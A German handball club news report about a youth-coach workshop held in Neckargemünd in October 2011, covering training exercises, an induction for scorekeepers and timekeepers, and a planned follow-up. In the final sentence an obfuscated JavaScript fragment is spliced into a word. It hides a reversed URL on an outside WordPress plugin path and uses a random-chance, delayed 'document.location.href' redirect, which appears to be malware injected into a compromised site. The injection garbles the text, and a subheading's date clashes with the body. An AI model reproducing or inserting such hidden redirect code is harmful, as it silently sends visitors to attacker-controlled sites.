Workshop für Jugendtrainer erfolgreich umgesetzt

Neckargemünd, 31.10.2011 (ahe) – Am Samstag, den 29.10.2011, veranstaltete der TVN den “2. Jugendtrainer-Workshop“ in der Neckargemünder Münzenbachhalle.

Nach der Darlegung des bereits im letzten Jahr entworfenen TVN Jugendtrainingskonzeptes, wurde allen Jugendtrainern von Trainer und 1. Herren-Spieler Alexander Herd eine Vielzahl an Übungen, Übungsmöglichkeiten und Spielformen zur besseren Umsetzung nahe gebracht. Mit viel Engagement – und vor allem viel Spaß – wurde das neu erlernte im praktischen Teil des Tages auch gleich am Ball ausprobiert.

Schriftführer oder Zeitnehmer – Wie geht das?

Im Anschluss fand für alle Betreuer, Eltern und Interessierte eine Einweisung in die Technik und Lagerräume der neuen Halle statt. Dabei wurde gleichzeitig eine ausführliche Unterweisung für Schriftführer und Zeitnehmer vorgenommen. Insbesondere die Bedienung der elektronischen Zeittafel war sinnvoll und notwendig. Natürlich durfte auch ein gemütlicher Abschluss nicht fehlen: Nach all den Anstrengungen ließen die Teilnehmer den informativen Nachmittag mit Kaffee und Kuchen ausklingen.

Nächster Workshop: März 2011

Nach dem wiederholten Erfolg sowie überwiegend positiven Rückmeldungen ist der nächste Workshop im März 2012 bereits fest eingeplant. Auch an diesem Termin wird es wieder eine Einweisung inklusive Einbindung der Eltern und Interessierten geben. Bis dahin gilt: Ein herzliches Dankeschön an alle Organisatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toren und Teilnehmer des diesjährigen Workshops!